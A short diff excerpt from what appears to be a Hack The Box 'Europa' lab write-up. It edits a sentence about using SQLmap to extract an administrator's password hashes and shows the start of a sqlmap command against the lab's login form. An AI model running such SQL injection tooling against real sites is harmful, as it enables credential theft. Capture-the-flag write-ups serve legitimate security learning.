v3-debug/minimal-mistakes/_posts/2017-12-02-htb-europa.markdown

 ## SQLmap
-Alternatively, SQLmap can be used to extract the password hashes of the administrator and cracking them.
+Alternatively, SQLmap can be used to extract the password hashes of the administrator.
+Cracking them should be the easy part.

 ```console
 root@EdgeOfNight:~# sqlmap -u https://admin-portal.europacorp.htb/login.php --data "email=whatever&password=whatever"